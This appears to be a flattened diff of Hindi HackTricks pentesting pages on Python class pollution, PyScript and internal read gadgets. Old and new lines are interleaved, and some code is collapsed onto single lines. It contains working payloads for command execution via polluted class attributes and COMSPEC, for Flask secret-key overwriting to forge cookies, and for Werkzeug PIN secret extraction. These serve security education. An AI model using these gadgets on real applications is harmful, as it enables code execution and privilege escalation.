* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके हैकिंग ट्रिक्स साझा करें।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,23 +1,23 @@
# Class Pollution (Python's Prototype Pollution) # कक्षा प्रदूषण (Python का प्रोटोटाइप प्रदूषण)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें** हैकिंग ट्रिक्स को **पीआर्स** और **HackTricks Cloud** github रेपो में प्रस्तुत करके।
</details> </details>
{% endhint %}
## मूल उदाहरण ## मूल उदाहरण
जांचें कि स्ट्रिंग के साथ ऑब्ज जांचें कैसे संदेशों के साथ ऑब्जेक्ट की कक्षाओं को प्रदूषित किया जा सकता है:
```python ```python
class Company: pass class Company: pass
class Developer(Company): pass class Developer(Company): pass
@ -41,9 +41,7 @@ e.__class__.__base__.__base__.__qualname__ = 'Polluted_Company'
print(d) #<__main__.Polluted_Developer object at 0x1041d2b80> print(d) #<__main__.Polluted_Developer object at 0x1041d2b80>
print(c) #<__main__.Polluted_Company object at 0x1043a72b0> print(c) #<__main__.Polluted_Company object at 0x1043a72b0>
``` ```
## मूलभूत सुरक्षादायकता उदाहरण ## मूलभूत सुरक्षादायकता उदाहरण
```python ```python
# Initial state # Initial state
class Employee: pass class Employee: pass
@ -76,36 +74,57 @@ USER_INPUT = {
merge(USER_INPUT, emp) merge(USER_INPUT, emp)
print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}} print(vars(emp)) #{'name': 'Ahemd', 'age': 23, 'manager': {'name': 'Sarah'}}
``` ```
## गैजेट उदाहरण ## गैजेट उदाहरण
<details> <details>
<summary>क्लास संपत्ति की डिफ़ॉल्ट मान को RCE (subprocess) बनाना</summary> <summary>कक्ष संपत्ति डिफ़ॉल्ट मान को RCE (subprocess) बनाना</summary>
```python
from os import popen
class Employee: pass # Creating an empty class
class HR(Employee): pass # Class inherits from Employee class
class Recruiter(HR): pass # Class inherits from HR class
\`\`\`python from os import popen class Employee: pass # Creating an empty class class HR(Employee): pass # Class inherits from Employee class class Recruiter(HR): pass # Class inherits from HR class class SystemAdmin(Employee): # Class inherits from Employee class
def execute_command(self):
class SystemAdmin(Employee): # Class inherits from Employee class def execute\_command(self): command = self.custom\_command if hasattr(self, 'custom\_command') else 'echo Hello there' return f'\[!] Executing: "{command}", output: "{popen(command).read().strip()}"' command = self.custom_command if hasattr(self, 'custom_command') else 'echo Hello there'
return f'[!] Executing: "{command}", output: "{popen(command).read().strip()}"'
def merge(src, dst): def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
## Recursive merge function USER_INPUT = {
"__class__":{
"__base__":{
"__base__":{
"custom_command": "whoami"
}
}
}
}
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) recruiter_emp = Recruiter()
system_admin_emp = SystemAdmin()
USER\_INPUT = { "**class**":{ "**base**":{ "**base**":{ "custom\_command": "whoami" } } } } print(system_admin_emp.execute_command())
#> [!] Executing: "echo Hello there", output: "Hello there"
recruiter\_emp = Recruiter() system\_admin\_emp = SystemAdmin() # Create default value for Employee.custom_command
merge(USER_INPUT, recruiter_emp)
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "echo Hello there", output: "Hello there" print(system_admin_emp.execute_command())
#> [!] Executing: "whoami", output: "abdulrah33m"
## Create default value for Employee.custom\_command ```
merge(USER\_INPUT, recruiter\_emp)
print(system\_admin\_emp.execute\_command()) #> \[!] Executing: "whoami", output: "abdulrah33m"
````
</details> </details>
<details> <details>
@ -137,40 +156,46 @@ merge({'__class__':{'__init__':{'__globals__':{'not_accessible_variable':'Pollut
print(not_accessible_variable) #> Polluted variable print(not_accessible_variable) #> Polluted variable
print(NotAccessibleClass) #> <class '__main__.PollutedClass'> print(NotAccessibleClass) #> <class '__main__.PollutedClass'>
```` ```
</details> </details>
<details> <details>
<summary>अनियमित subprocess क्रियान्वयन</summary> <summary>अनियमित subprocess क्रियान्वयन</summary>
```python
import subprocess, json
\`\`\`python import subprocess, json class Employee:
def __init__(self):
class Employee: def **init**(self): pass pass
def merge(src, dst): def merge(src, dst):
# Recursive merge function
for k, v in src.items():
if hasattr(dst, '__getitem__'):
if dst.get(k) and type(v) == dict:
merge(v, dst.get(k))
else:
dst[k] = v
elif hasattr(dst, k) and type(v) == dict:
merge(v, getattr(dst, k))
else:
setattr(dst, k, v)
## Recursive merge function # Overwrite env var "COMSPEC" to execute a calc
USER_INPUT = json.loads('{"__init__":{"__globals__":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"}}}}}}') # attacker-controlled value
for k, v in src.items(): if hasattr(dst, '**getitem**'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst\[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) merge(USER_INPUT, Employee())
## Overwrite env var "COMSPEC" to execute a calc
USER\_INPUT = json.loads('{"**init**":{"**globals**":{"subprocess":{"os":{"environ":{"COMSPEC":"cmd /c calc"\}}\}}\}}') # attacker-controlled value
merge(USER\_INPUT, Employee())
subprocess.Popen('whoami', shell=True) # Calc.exe will pop up subprocess.Popen('whoami', shell=True) # Calc.exe will pop up
```
````
</details> </details>
<details> <details>
<summary>ओवरराइटिंग <strong><code>__kwdefaults__</code></strong></summary> <summary>ओवरराइटिंग <strong><code>__kwdefaults__</code></strong></summary>
**`__kwdefaults__`** सभी फ़ंक्शन की एक विशेष विशेषता है, पायथन [दस्तावेज़ीकरण](https://docs.python.org/3/library/inspect.html) के आधार पर, यह "किसी भी डिफ़ॉल्ट मानों का मैपिंग है **कीवर्ड-केवल** पैरामीटर्स के लिए।" इस विशेषता को प्रदूषित करने से हमें फ़ंक्शन के कीवर्ड-केवल पैरामीटर्स के डिफ़ॉल्ट मान को नियंत्रित करने की अनुमति मिलती है, ये वह फ़ंक्शन के पैरामीटर्स हैं जो \* या \*args के बाद आते हैं। **`__kwdefaults__`** सभी फ़ंक्शन की एक विशेष विशेषता है, Python [दस्तावेज़ीकरण](https://docs.python.org/3/library/inspect.html) के आधार पर, यह "किसी भी डिफ़ॉल्ट मानों का मैपिंग है **कीवर्ड-केवल** पैरामीटर्स के लिए।" इस विशेषता को प्रदूषित करने से हमें फ़ंक्शन के कीवर्ड-केवल पैरामीटर्स की डिफ़ॉल्ट मानों को नियंत्रित करने की अनुमति मिलती है, ये वह फ़ंक्शन के पैरामीटर्स हैं जो \* या \*args के बाद आते हैं।
```python ```python
from os import system from os import system
import json import json
@ -206,33 +231,28 @@ merge(emp_info, Employee())
print(execute.__kwdefaults__) #> {'command': 'echo Polluted'} print(execute.__kwdefaults__) #> {'command': 'echo Polluted'}
execute() #> Executing echo Polluted execute() #> Executing echo Polluted
#> Polluted #> Polluted
```` ```
</details> </details>
<details> <details>
<summary>फ़्लास्क सीक्रेट को फ़ाइलों के बीच अधिलेखन करना</summary> <summary>फ़्लास्क सीक्रेट को फ़ाइलों के बीच ओवरराइट करना</summary>
तो, अगर आप एक वस्तु पर क्लास प्रदूषण कर सकते हैं जो वेब के मुख्य पायथन फ़ाइल में परिभाषित है परंतु **जिसका क्लास अलग फ़ाइल में परिभाषित है**। क्योंकि पिछले पेलोड में \_\_globals\_\_ तक पहुँचने के लिए आपको वस्तु के क्लास या क्लास के विधियों तक पहुँचने की आवश्यकता है, आप **उस फ़ाइल में ग्लोबल्स तक पहुँच सकेंगे, पर मुख्य फ़ाइल में नहीं**।\
इसलिए, आप **फ़्लास्क ऐप ग्लोबल वस्तु तक पहुँच नहीं पाएंगे** जिसने मुख्य पृष्ठ में **सीक्रेट कुंजी** को परिभाषित किया था:
तो, अगर आप एक क्लास पोल्लूशन कर सकते हैं जो एक वेब के मुख्य पायथन फ़ाइल में परिभाषित ऑब्जेक्ट पर **हो** लेकिन **जिसका क्लास मुख्य फ़ाइल से अलग फ़ाइल में परिभाषित है**। क्योंकि पिछले payloads में \_\_globals\_\_ तक पहुँचने के लिए आपको ऑब्जेक्ट के क्लास या क्लास के मेथड्स तक पहुँचने की आवश्यकता है, आप **उस फ़ाइल में ग्लोबल्स तक पहुँच सकेंगे, लेकिन मुख्य फ़ाइल में नहीं**। \
इसलिए, आप **फ़्लास्क एप्लिकेशन ग्लोबल ऑब्जेक्ट तक पहुँच नहीं पाएंगे** जिसने मुख्य पृष्ठ में **सीक्रेट कुंजी** को परिभाषित किया था:
```python ```python
app = Flask(__name__, template_folder='templates') app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)' app.secret_key = '(:secret:)'
``` ```
इस स्थिति में आपको एक गैजेट की आवश्यकता है जो फ़ाइलों को ट्रावर्स करने के लिए मुख्य फ़ाइल तक पहुंचने के लिए **ग्लोबल ऑब्जेक्ट `app.secret_key` तक पहुंचने** के लिए फ्लास्क सीक्रेट कुंजी को बदलने और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ाने**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) के लिए सक्षम होना होगा।
इस स्थिति में आपको एक गैजेट की आवश्यकता है ताकि मुख्य फ़ाइल तक पहुंचकर **ग्लोबल ऑब्जेक्ट `app.secret_key` तक पहुंच सकें** और फ्लास्क सीक्रेट कुंजी को बदल सकें और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ा सकें**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign)। इस तरह के एक पेलोड [इस लेखन से](https://ctftime.org/writeup/36082):
इस व्रिटअप से एक इस प्रकार का पेलोड:
{% code overflow="wrap" %}
```python ```python
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
``` ```
{% endcode %} {% endcode %}
इस payload का उपयोग करें **`app.secret_key`** को बदलने के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि नए और अधिक विशेषाधिकार वाले flask cookies को साइन कर सकें। इस payload का उपयोग करें **`app.secret_key` को बदलने** के लिए (आपके ऐप में नाम अलग हो सकता है) नए और अधिक विशेषाधिकार वाले flask cookies को साइन करने की क्षमता प्राप्त करें।
</details> </details>
@ -246,16 +266,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
* [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/) * [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/)
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें** **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}

View file

@ -1,24 +1,25 @@
# पायस्क्रिप्ट # पायस्क्रिप्ट
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** (https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs जमा करके।
</details> </details>
{% endhint %}
## पायस्क्रिप्ट पेंटेस्टिंग गाइड ## पायस्क्रिप्ट पेंटेस्टिंग गाइड
पायस्क्रिप्ट एक नया फ्रेमवर्क है जो Python को HTML में एकीकृत करने के लिए विकसित किया गया है, ताकि यह HTML के साथ उपयोग किया जा सके। इस चीट शीट में, आपको अपने पेनेट्रेशन टेस्टिंग उद्देश्यों के लिए पायस्क्रिप्ट का उपयोग कैसे करना है, इसका विवरण मिलेगा पायस्क्रिप्ट एक नया फ्रेमवर्क है जो Python को HTML में एकीकृत करने के लिए विकसित किया गया है, ताकि यह HTML के साथ उपयोग किया जा सके। इस चीट शीट में, आपको यहाँ पायस्क्रिप्ट का उपयोग पेनेट्रेशन टेस्टिंग के उद्देश्यों के लिए कैसे करें के बारे में जानकारी मिलेगी
### Emscripten वर्चुअल मेमोरी फ़ाइल सिस्टम से फ़ाइलों को डंप / पुनः प्राप्त करना: ### Emscripten वर्चुअल मेमोरी फ़ाइलसिस्टम से फ़ाइलों को डंप/पुनःप्राप्त करना:
`CVE ID: CVE-2022-30286`\ `CVE ID: CVE-2022-30286`\
\ \
@ -108,16 +109,17 @@ Result:
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,41 +1,48 @@
# Python आंतरिक पढ़ने के गैजेट्स # Python आंतरिक पठन गैजेट्स
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
## मूल जानकारी ## मूल जानकारी
[**Python Format Strings**](bypass-python-sandboxes/#python-format-string) जैसी विभिन्न सुरक्षा दोष या [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) आपको **Python आंतरिक डेटा पढ़ने की अनुमति देती हैं लेकिन आपको कोड को नहीं चलाने देतीं**। इसलिए, एक पेंटेस्टर को इन पढ़ने की अनुमतियों का सबसे अधिक उपयोग करना होगा ताकि **संवेदनशील विशेषाधिकार प्राप्त कर सके और सुरक्षा दोष को उन्नत कर सके** विभिन्न सुरक्षा गंभीरताएं जैसे कि [**Python Format Strings**](bypass-python-sandboxes/#python-format-string) या [**Class Pollution**](class-pollution-pythons-prototype-pollution.md) आपको **Python आंतरिक डेटा पठन करने की अनुमति देती हैं लेकिन आपको कोड को नहीं चलाने देगी**। इसलिए, एक पेंटेस्टर को इन पठन अनुमतियों का सबसे अधिक उपयोग करने की आवश्यकता होगी **संवेदनशील विशेषाधिकार प्राप्त करने और सुरक्षा गंभीरता को उन्नत करने** के लिए
### Flask - गुप्त कुंजी पढ़ें ### Flask - गुप्त कुंजी पठन
एक Flask एप्लिकेशन का मुख्य पृष्ठ **`app`** ग्लोबल ऑब्जेक्ट होगा जहाँ यह **गुप्त कूटिक** कॉन्फ़िगर किया जाएगा एक Flask एप्लिकेशन का मुख्य पृष्ठ शायद **`app`** ग्लोबल ऑब्जेक्ट होगा जहाँ यह **गुप्त कूट समाकृत होता है**
```python ```python
app = Flask(__name__, template_folder='templates') app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)' app.secret_key = '(:secret:)'
``` ```
इस मामले में, इस ऑब्ज इस मामले में, इस ऑब्जेक्ट तक पहुंचना संभव है जिसके लिए केवल किसी गैजेट का उपयोग करना है **ग्लोबल ऑब्जेक्ट्स तक पहुंचने** के लिए [**बाइपास पायथन सैंडबॉक्स पेज**](bypass-python-sandboxes/) से।
उस मामले में जहां **वलनरेबिलिटी एक विभिन्न पायथन फ़ाइल में है**, आपको मुख्य फ़ाइल तक पहुंचने के लिए फ़ाइलों को चलने के लिए एक गैजेट की आवश्यकता है ताकि **ग्लोबल ऑब्जेक्ट `app.secret_key`** तक पहुंच सकें और फ्लास्क सीक्रेट कुंजी को बदल सकें और [**इस कुंजी को जानकर विशेषाधिकारों को बढ़ाने**](../../network-services-pentesting/pentesting-web/flask.md#flask-unsign) में सक्षम हों।
इस लेख से एक ऐसा पेलोड:
{% code overflow="wrap" %}
```python ```python
__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key
``` ```
{% endcode %} {% endcode %}
इस payload का उपयोग करें **`app.secret_key`** को बदलने के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि आप नए और अधिक विशेषाधिकार flask cookies को साइन कर सकें। इस payload का उपयोग करें **`app.secret_key` को बदलने** के लिए (आपके ऐप में नाम अलग हो सकता है) ताकि आप नए और अधिक विशेषाधिकार वाले flask cookies को साइन कर सकें।
### Werkzeug - machine\_id और node uuid ### Werkzeug - machine\_id और node uuid
[**इस लेख से इन payload का उपयोग करके**](https://vozec.fr/writeups/tweedle-dum-dee/) आप **machine\_id** और **uuid** नोड तक पहुँच सकेंगे, जो हैं **मुख्य रहस्य** जिनकी आपको आवश्यकता होगी [**Werkzeug pin उत्पन्न करने के लिए**](../../network-services-pentesting/pentesting-web/werkzeug.md) जिसका उपयोग आप `/console` में पहुँचने के लिए कर सकते हैं अगर **debug mode सक्षम है:** [**इस लेख से इन payload का उपयोग करके**](https://vozec.fr/writeups/tweedle-dum-dee/) आप **machine\_id** और **uuid** नोड तक पहुँच सकेंगे, जो हैं **मुख्य रहस्य** जिनकी आपको [**Werkzeug पिन उत्पन्न करने के लिए**](../../network-services-pentesting/pentesting-web/werkzeug.md) आवश्यकता है जिसका उपयोग आप `/console` में पहुँचने के लिए कर सकते हैं अगर **डीबग मोड सक्षम है:**
```python ```python
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id} {ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node} {ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}
@ -46,16 +53,17 @@ __init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.se
